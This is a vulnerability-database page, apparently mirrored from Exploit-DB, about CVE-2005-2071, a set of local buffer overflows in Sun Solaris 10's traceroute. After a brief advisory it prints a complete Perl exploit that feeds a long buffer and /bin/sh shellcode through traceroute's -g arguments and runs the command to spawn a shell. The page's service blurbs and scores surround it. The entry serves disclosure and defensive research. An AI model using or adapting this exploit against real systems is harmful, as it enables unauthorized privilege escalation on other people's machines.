Lucene search
+L

Sun Solaris 10 Traceroute - Multiple Local Buffer Overflow Vulnerabilities

🗓️ 24 Jun 2005 00:00:00Reported by Przemyslaw FrasunekType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 26 Views

Sun Solaris 10 Traceroute Multiple Buffer Overflow Vulnerabilitie

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2005-2071
29 Jun 200504:00
cve
cvelist
Cvelist
CVE-2005-2071
29 Jun 200504:00
cvelist
euvd
EUVD
EUVD-2005-2073
7 Oct 202500:30
euvd
nvd
NVD
CVE-2005-2071
29 Jun 200504:00
nvd
nessus
Tenable Nessus
Solaris 10 (sparc) : 121012-03
7 Dec 200500:00
nessus
nessus
Tenable Nessus
Solaris 10 (x86) : 121013-03
7 Dec 200500:00
nessus
source: https://www.securityfocus.com/bid/14049/info

Sun Solaris traceroute is affected by multiple local buffer overflow vulnerabilities.

These vulnerabilities present themselves when the application handles excessive data supplied through command line arguments.

These issue are reported to affect /usr/sbin/traceroute running on Sun Solaris 10.

Some reports indicate that this issue cannot be reproduced. It is also reported that this issue is only exploitable on the Solaris x86 platform.

#!/usr/bin/perl

$ret = 0x8046bb0;  # heap, solaris on amd64

$shellcode = "A" x 5000 .
"\xb8\xff\xf8\xff\x3c\xf7\xd0\x50\x31\xc0\xb0\x9a\x50\x89\xe5\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68/bin\x89\xe3\x50\x53\x89\xe2\x50\x52\x53\xb0\x3b\xff\xd5";

$ip = sprintf("%d.%d.%d.%d", $ret & 0xff, ($ret & 0xff00) >> 8, ($ret &
0xff0000) >> 16, ($ret & 0xff000000) >> 24);

$cmd = "/usr/sbin/traceroute -g '$shellcode' -g 2 -g 3 -g 4 -g 5 -g 6 -g 7 -g 8
-g 9 -g 10 $ip";

print $cmd, "\n";

system($cmd);

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Jun 2013 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.6
EPSS0.01056
26